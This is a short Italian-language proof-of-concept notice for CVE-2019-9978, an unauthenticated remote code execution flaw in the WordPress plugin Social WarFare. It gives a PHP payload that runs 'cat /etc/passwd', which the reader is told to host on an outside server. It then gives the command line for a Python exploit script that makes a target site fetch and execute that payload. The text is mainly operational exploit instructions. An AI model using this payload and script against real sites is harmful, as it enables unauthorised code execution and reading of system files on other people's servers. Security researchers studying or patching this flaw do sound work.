
CVE-2019-9978 - (PoC) RCE nel plugin Social WarFare (<=3.5.2)
CVE-2019-9978 - (PoC) RCE nel plugin Social WarFare (<=3.5.2)
È stata scoperta un'esecuzione di codice in modalità remota non autenticata nella funzionalità che gestisce l'importazione delle impostazioni. Un utente può sfruttare l'uso di RFI per RCE.
Copia il seguente payload:
<pre>system('cat /etc/passwd')</pre>
Salvalo con il nome file: payload.txt e caricalo su un server. L'URI dovrebbe essere simile a: http(s)://yoursite.com/payload.txt. Infine, fornisci le opzioni --target e --payload-uri:
$ python cve-2019-9978.py --target http://vulntarget.com \
--payload-uri http://yourpayloadsite.com/payload.txt

Ricercatore: Luka Sikic
Link: https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
Autore: @hash3liZer